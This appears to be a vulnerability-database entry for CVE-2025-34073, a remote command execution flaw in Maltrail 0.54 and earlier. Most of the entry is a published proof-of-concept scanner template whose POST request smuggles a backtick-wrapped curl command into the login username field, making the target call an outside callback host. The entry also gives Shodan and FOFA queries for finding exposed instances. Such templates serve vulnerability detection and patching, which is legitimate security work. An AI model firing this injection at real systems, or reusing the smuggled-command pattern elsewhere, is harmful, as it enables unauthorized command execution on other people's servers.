漏洞描述
Maltrail versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint.
CVE-2025-34073: Maltrail <=0.54 Username Parameter - Remote Command Execution
PoC代码[已公开]
id: CVE-2025-34073
info:
name: Maltrail <=0.54 Username Parameter - Remote Command Execution
author: SeungAh-Hong
severity: critical
description: |
Maltrail versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint.
reference:
- https://huntr.com/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87
- https://vulncheck.com/advisories/stamparm-maltrail-rce
- https://github.com/stamparm/maltrail/issues/19146
- https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/http/maltrail_rce.rb
metadata:
max-request: 1
shodan-query: http.title:"Maltrail"
fofa-query: app="Maltrail"
tags: cve,cve2025,maltrail,rce,unauth,oss
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=;`curl http://{{interactsh-url}}`
matchers:
- type: dsl
dsl:
- 'contains(header, "Maltrail")'
- "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
condition: and
# digest: 4b0a00483046022100b6cb29e1be26b66ef70b5fe49d9d0f66de28b03f334d700f770936c37794fbc90221008118e7b969383762eab736c41540f15bdd9e2f0627dede0ba5d6ed0bed34e851:922c64590222798bb761d5b6d8e72950